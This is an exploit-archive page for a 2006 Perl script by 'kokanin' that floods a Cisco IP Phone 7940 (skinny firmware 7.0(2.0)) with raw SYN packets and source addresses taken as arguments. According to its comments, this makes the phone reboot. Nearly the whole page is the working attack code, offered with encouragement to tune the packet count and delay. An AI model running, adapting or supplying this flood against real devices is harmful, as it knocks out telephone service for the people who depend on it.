Cisco IP Phone 7940 (Reboot) Denial of Service Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Cisco IP Phone 7940 (Reboot) Denial of Service Exploit
# Published : 2006-01-10
# Author : kokanin
# Previous Title : HomeFtp 1.1 (NLST) Denial of Service Vulnerability
# Next Title : BlueCoat WinProxy <= 6.0 R1c (GET Request) Denial of Service Exploit

#!/usr/bin/perl
# This is made for trashing cisco 7940 ip phones. kokanin made/discovered this.
# A packetcount of 1000 and a packetdelay of 0.002 sent to port 80 makes my 
# phone reboot - play with the settings and stuff. PRIVATE PRIVATE PRIVATE!!!
# not private anymore. Vulnerable phones are running ver. 7.0(2.0) using the skinny
# protocol - this is not for the SIP firmware.

use Net::RawIP;
use Time::HiRes;
$pkt = new Net::RawIP;
die "Usage $0 <src> <dst> <target port> <number of pkts> <packet delay>" unless ($ARGV[4]);
$pkt->set({
        ip => {
                saddr => $ARGV[0],
                daddr => $ARGV[1] 
                },
        tcp=> { dest => $ARGV[2],
                syn => 1,
                seq => 0,
                ack => 0}
        });
for(1..$ARGV[3]){ $pkt->set({tcp=>{source=>int(rand(65535))}});Time::HiRes::sleep($ARGV[4]); $pkt->send; };

# www.Syue.com [2006-01-10]